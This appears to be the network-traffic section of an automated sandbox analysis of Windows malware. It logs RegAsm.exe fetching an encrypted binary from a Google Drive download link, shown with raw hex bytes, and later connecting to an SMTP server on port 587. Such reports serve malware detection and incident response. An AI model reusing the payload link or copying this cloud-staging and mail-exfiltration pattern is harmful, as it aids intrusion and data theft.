                                                          Oct 13, 2021 17:10:52.171637058 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.171667099 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.171950102 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.171988964 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.172122955 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.172213078 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.172241926 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.172272921 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.172389030 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.172396898 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.172396898 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.172421932 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.172595978 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.172620058 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.172645092 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.172749043 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.172802925 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.172816992 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.172949076 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.172965050 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.172981024 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.173093081 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.173146009 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.173201084 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.173229933 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.173353910 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.173356056 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.173397064 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.173413038 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.173486948 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.173613071 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.173628092 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.173774958 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.173788071 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.173930883 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.173990965 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.174010992 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.174101114 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.174170971 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.174267054 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.174273014 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.174300909 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.174333096 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.174433947 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.174575090 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.174597025 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.174740076 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.174798012 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.174946070 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.174958944 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.174982071 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175090075 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.175182104 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175215960 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.175246000 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175338030 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.175357103 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175419092 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175422907 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.175441027 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175529957 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.175571918 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175584078 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.175611019 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175721884 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.175786972 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175863028 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.175880909 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.175990105 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.176039934 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.176069975 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.176189899 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.176232100 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:10:52.176244020 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.176387072 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.176429033 CEST49762443192.168.11.20142.250.184.193
                                                          Oct 13, 2021 17:10:52.176466942 CEST44349762142.250.184.193192.168.11.20
                                                          Oct 13, 2021 17:12:29.039627075 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:29.173234940 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:29.173428059 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:29.503778934 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:29.504885912 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:29.641139984 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:29.642463923 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:29.778268099 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:29.778733969 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:29.953253031 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:29.976290941 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:29.977415085 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:30.111505985 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:30.111851931 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:30.248964071 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:30.249249935 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:30.383230925 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:30.383560896 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:30.385278940 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:30.385360003 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:30.385370970 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:30.385380030 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:12:30.520730019 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:30.531739950 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:30.537480116 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:12:30.579920053 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:14:08.745807886 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:14:08.910492897 CEST58749766132.148.164.170192.168.11.20
                                                          Oct 13, 2021 17:14:08.910852909 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:14:08.911823034 CEST49766587192.168.11.20132.148.164.170
                                                          Oct 13, 2021 17:14:09.058815956 CEST58749766132.148.164.170192.168.11.20

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 13, 2021 17:10:50.858958006 CEST5901153192.168.11.201.1.1.1
                                                          Oct 13, 2021 17:10:50.890136003 CEST53590111.1.1.1192.168.11.20
                                                          Oct 13, 2021 17:10:51.819138050 CEST6289753192.168.11.201.1.1.1
                                                          Oct 13, 2021 17:10:51.850991964 CEST53628971.1.1.1192.168.11.20
                                                          Oct 13, 2021 17:12:28.708491087 CEST5600953192.168.11.201.1.1.1
                                                          Oct 13, 2021 17:12:28.981965065 CEST53560091.1.1.1192.168.11.20

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Oct 13, 2021 17:10:50.858958006 CEST192.168.11.201.1.1.10x299eStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 17:10:51.819138050 CEST192.168.11.201.1.1.10x4cbaStandard query (0)doc-0c-28-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                          Oct 13, 2021 17:12:28.708491087 CEST192.168.11.201.1.1.10xcab0Standard query (0)mail.binaryinfotech.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Oct 13, 2021 17:09:29.455667973 CEST1.1.1.1192.168.11.200xfaaaNo error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 17:09:29.455667973 CEST1.1.1.1192.168.11.200xfaaaNo error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 17:10:50.890136003 CEST1.1.1.1192.168.11.200x299eNo error (0)drive.google.com216.58.212.174A (IP address)IN (0x0001)
                                                          Oct 13, 2021 17:10:51.850991964 CEST1.1.1.1192.168.11.200x4cbaNo error (0)doc-0c-28-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 17:10:51.850991964 CEST1.1.1.1192.168.11.200x4cbaNo error (0)googlehosted.l.googleusercontent.com142.250.184.193A (IP address)IN (0x0001)
                                                          Oct 13, 2021 17:12:28.981965065 CEST1.1.1.1192.168.11.200xcab0No error (0)mail.binaryinfotech.combinaryinfotech.comCNAME (Canonical name)IN (0x0001)
                                                          Oct 13, 2021 17:12:28.981965065 CEST1.1.1.1192.168.11.200xcab0No error (0)binaryinfotech.com132.148.164.170A (IP address)IN (0x0001)
                                                          Oct 13, 2021 17:15:45.810672045 CEST1.1.1.1192.168.11.200x5ac8No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • drive.google.com
                                                          • doc-0c-28-docs.googleusercontent.com

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.11.2049761216.58.212.174443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2021-10-13 15:10:51 UTC0OUTGET /uc?export=download&id=1C8oenb3NC7djnCvQzvUetP49sAKvj9vX HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          2021-10-13 15:10:51 UTC0INHTTP/1.1 302 Moved Temporarily
                                                          Content-Type: text/html; charset=UTF-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Wed, 13 Oct 2021 15:10:51 GMT
                                                          Location: https://doc-0c-28-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vr17dakf7s0cou2qripnjj0rpkilfov4/1634137800000/16524389560697724177/*/1C8oenb3NC7djnCvQzvUetP49sAKvj9vX?e=download
                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                          Content-Security-Policy: script-src 'nonce-TwnCVV53jbGE0i06UXqRCA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: GSE
                                                          Set-Cookie: NID=511=jawT2jUe4SmKff1Q1P7zjHFTSNSFjuPRk80be3EaXOXwtody4IWZ_uWlEtLrs-WTlbav4OgKR97Trl1WjzsEPT9wfI0Mww737M47P-x6tuohcYgkAHe9cmgVz-CVYrlSwWmg1xr9x4sCvKMdfnEHm6nLnf_WmtySzXDjqnzS380; expires=Thu, 14-Apr-2022 15:10:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                          Accept-Ranges: none
                                                          Vary: Accept-Encoding
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          2021-10-13 15:10:51 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 32 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 76 72 31 37
                                                          Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-28-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vr17
                                                          2021-10-13 15:10:51 UTC1INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.11.2049762142.250.184.193443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2021-10-13 15:10:51 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vr17dakf7s0cou2qripnjj0rpkilfov4/1634137800000/16524389560697724177/*/1C8oenb3NC7djnCvQzvUetP49sAKvj9vX?e=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                          Cache-Control: no-cache
                                                          Host: doc-0c-28-docs.googleusercontent.com
                                                          Connection: Keep-Alive
                                                          2021-10-13 15:10:52 UTC2INHTTP/1.1 200 OK
                                                          X-GUploader-UploadID: ADPycdvGc1yMOe9Q2nGPFMgXdWfvIlitzoKArkRs7gh0EJllP-hMLRj5LIUCsHVjhEx6orslUu7Q084G22fkrntXgAstJIPE2Q
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: false
                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                          Access-Control-Allow-Methods: GET,OPTIONS
                                                          Content-Type: application/octet-stream
                                                          Content-Disposition: attachment;filename="MR P_pWKqVkM170.bin";filename*=UTF-8''MR%20P_pWKqVkM170.bin
                                                          Content-Length: 221760
                                                          Date: Wed, 13 Oct 2021 15:10:52 GMT
                                                          Expires: Wed, 13 Oct 2021 15:10:52 GMT
                                                          Cache-Control: private, max-age=0
                                                          X-Goog-Hash: crc32c=w6EYCA==
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                          Connection: close
                                                          2021-10-13 15:10:52 UTC5INData Raw: 76 c3 82 3e 08 bb 94 fa 32 9f b6 32 1c 23 fe 4e db 92 5c 63 e4 47 5d 9d f4 7b 6d ea 7c 6f 77 17 05 77 06 2c 04 9c d1 df 0f e6 61 40 fe b0 06 dd 36 bf 1c f1 f7 a8 3a 62 ee 97 24 dd 3d 84 5b e6 ae 71 70 71 90 ad 03 48 e1 35 39 4e 04 8f de 93 95 b3 a4 c3 08 14 00 56 69 4f 95 1b a8 49 b5 0c 31 be ea ba 71 6b ec f7 18 1f 15 db b3 32 4d c8 67 3f 18 2e 3d 41 42 1a 6c 6f 0f a8 4e 72 b8 ab de b9 69 9c b4 03 98 2c fd 6a 2f 3e cf f0 04 db e1 6f d3 e4 8f cc 1d 13 f0 b5 76 5a 25 fe 64 2d 77 b3 ec 04 44 a5 f0 18 33 21 25 5f 01 55 6a cf 7f 19 70 20 49 48 32 33 da a4 32 97 e1 d2 53 25 00 57 0e 6d 1f ca e8 85 8a 39 06 50 20 da da 95 9b c9 95 3e b3 d3 03 38 f7 01 56 6a 47 61 f2 2b 16 a8 ef 30 36 3c 8c 11 f4 3f 5e 43 a8 b0 b5 7e 4b f6 36 7d b3 9b 7d e9 24 6c 02 44 fb 8b 0c
                                                          Data Ascii: v>22#N\cG]{m|oww,a@6:b$=[qpqH59NViOI1qk2Mg?.=ABloNri,j/>ovZ%d-wD3!%_Ujp IH232S%Wm9P >8VjGa+06<?^C~K6}}$lD
                                                          2021-10-13 15:10:52 UTC9INData Raw: 9f 14 5c 5e 76 da da 9f 88 cc 84 3b 59 0d 31 30 d0 06 54 05 10 39 f1 21 ca 7e e5 38 1a 3a 84 7e 0d 49 5d 49 74 b8 9b 7c 4b f0 3c a3 a1 b3 0a e9 24 46 2a 6a f9 89 0a c8 e7 94 e7 da 8d 69 e8 af 44 2e 6b ae 9e 8c dc af 00 cd fc 67 d6 31 f4 55 3a 2e 22 2a 43 94 c5 82 b2 f0 01 c3 b9 19 89 dd 27 67 40 cb 17 fd 1c 90 13 79 57 1e 36 75 58 bf 48 ed 15 00 ac 27 9f b5 ac 02 3a 7a 33 f6 14 33 f0 ea b7 8b 78 76 b7 cc fe 29 e5 2f 84 44 51 58 c4 d6 d3 e5 3a 10 ac 7a 16 72 15 e1 18 3a d5 7e 67 75 5b 11 c7 a7 7e 6a 60 c4 33 3d 92 5e ce 07 ce 71 a5 fa da 7a e9 65 05 68 b0 c8 11 cc 47 40 ee 51 15 b4 4b b3 a4 18 c3 bb 4f 5d a3 df 2c ef 23 43 bd 79 f5 16 05 6e 8c 67 5d 15 ef c5 d0 94 3f f8 b2 a7 0e 86 f1 cf f7 f1 fd e6 cb 32 fc 06 9e 1b fe 63 6c c0 b0 e2 c3 e5 1a 33 78 be 82
                                                          Data Ascii: \^v;Y10T9!~8:~I]It|K<$F*jiD.kg1U:."*C'g@yW6uXH':z33xv)/DQX:zr:~gu[~j`3=^qzehG@QKO],#Cyng]?2cl3x
                                                          2021-10-13 15:10:52 UTC13INData Raw: bd b0 46 4d 80 fd 58 d5 29 e1 a2 05 a2 16 14 60 bb 38 a1 14 c5 de f1 a5 31 86 a0 b1 4e 09 53 d0 e5 e5 96 b2 da 36 e9 1f 67 75 8a 68 65 e2 87 f5 15 62 3a 2c 6e ac 8b dc 74 93 03 a1 d9 b8 9b a9 fc 88 f6 0d 6a a6 fe f7 29 38 79 d5 7e 37 2b da a3 e7 0b 16 70 04 9e 93 cf c1 32 f5 07 af b1 65 33 6d c5 38 df e3 0a 6e 09 1c 31 d5 a8 61 39 70 29 9d 0f ba b5 d7 20 1d 2e 68 f5 16 a5 4d 2f 1c 4e 3f 4d c2 c8 2c 89 86 15 35 18 e0 4a 94 7f 4a b4 11 e6 e6 ea a4 4b 51 39 4e b9 19 08 08 b8 d0 8e 7e 78 83 31 0f 1f 6f 79 58 90 f6 0c 39 1c 30 f6 46 c0 76 c7 0a fb d7 5f 7b 41 59 6b e9 4a 18 dc f3 0e 47 50 31 2e af 74 a2 94 42 1b 45 d5 76 ac e1 59 3f 35 4f 12 8f 83 64 86 76 c3 55 80 cc 20 b9 7e 18 95 06 78 94 96 e0 75 bd d4 53 be 75 32 a0 ff 9a ee c5 60 fe 4d 67 64 e7 dd 00 14
                                                          Data Ascii: FMX)`81NS6guheb:,ntj)8y~7+p2e3m8n1a9p) .hM/N?M,5JJKQ9N~x1oyX90Fv_{AYkJGP1.tBEvY?5OdvU ~xuSu2`Mgd
                                                          2021-10-13 15:10:52 UTC16INData Raw: 7f 91 42 74 37 46 c8 76 8a c9 70 3b 2a 5d 32 8e be 6e 85 a3 fb be 7b 5c 15 be 00 0b 4b 09 59 94 85 e0 75 bd ed 70 96 4d 21 90 f7 44 e6 ec db fc 45 61 4c 3a cb 0b 35 81 1b 55 fe cc 69 a2 6f 4e fc 3b 2d 5a cb d7 98 2b c4 af 6d 74 ad ec 3d 64 b6 4f dc cc 37 ef 8f 72 1a 7f e2 c9 76 b4 00 23 b3 e5 f8 4f c5 3f dc a2 52 7b ff 7d ad 1b 9d 0b b8 18 a0 a9 49 6b 74 af ad 62 95 84 18 9b 1e c6 1f a9 46 1c 68 6b 66 5b 18 d0 34 c5 9e 07 37 35 4b f8 53 7e d8 df 6d 32 a0 a3 42 b7 00 c2 34 a5 be 8d 7e f8 7a ba 4d 37 89 45 d9 e8 ed 39 47 4d 06 88 4a 3d 5d f4 ed ff 9f b5 78 19 59 a2 32 dc 9d c9 33 e2 2b 95 c9 fd a4 40 31 f1 d0 48 d1 67 8c 7d 3a 40 8b 42 18 d9 bc 9f 48 84 d5 25 f7 46 e6 c4 c2 ec bd 71 53 d3 b5 b0 1d b6 c7 7f 08 bc 27 28 f0 9b 36 4f e9 22 68 53 26 76 75 4d 02
                                                          Data Ascii: Bt7Fvp;*]2n{\KYupM!DEaL:5UioN;-Z+mt=dO7rv#O?R{}IktbFhkf[475KS~m2B4~zM7E9GMJ=]xY23+@1Hg}:@BH%FqS'(6O"hS&vuM
                                                          2021-10-13 15:10:52 UTC18INData Raw: 66 4b f6 32 55 94 9b 3d e3 4b 9d 02 44 f1 af 1d c5 e7 7c e5 da 81 bf 96 b1 6e 2e 6f 86 b8 a4 dc a5 6d 1c 85 67 ca 98 e5 58 44 37 22 2a 45 fb 4d 82 f0 61 27 17 b6 3c a1 ea 27 67 4a d8 86 78 24 82 09 73 89 1f 3f 04 75 6a 5f ec 1f 3a d0 d9 60 5b 70 24 61 3b cd ea 6f 00 f0 f1 d9 d6 7e 5e f7 10 ef 24 e5 b2 84 44 51 31 1e b9 9f ef 23 24 c7 5b 36 3c 6b ef 77 77 d1 69 5e 4e 64 bc 8b a7 78 48 4c db 01 54 f5 76 ce 0d ce 48 ee 97 0c 7c 86 3f 2d 4c ba ce 33 95 53 68 da 3e 44 b2 6d 64 98 76 91 bb 6a 7f 9f d8 58 df 30 7e a8 05 a1 3e 3d 64 a4 23 82 30 e8 d3 f8 c4 31 f8 b8 b5 56 4d 6d cf f7 f6 89 3f de 32 f6 0b 8a 34 b7 23 7a e2 d6 f7 15 6e 93 22 38 a8 f1 cb 65 97 1b 77 9d 96 90 a6 cd f9 85 0f 6c cf 21 ea 3a 36 db d5 3a 30 0a 7e a0 cb 01 bd 7d 6c f5 b9 b1 c7 90 e0 1e fe
                                                          Data Ascii: fK2U=KD|n.omgXD7"*EMa'<'gJx$s?uj_:`[p$a;o~^$DQ1#$[6<kwwi^NdxHLTvH|?-L3Sh>DmdvjX0~>=d#01VMm?24#zn"8ewl!:6:0~}l
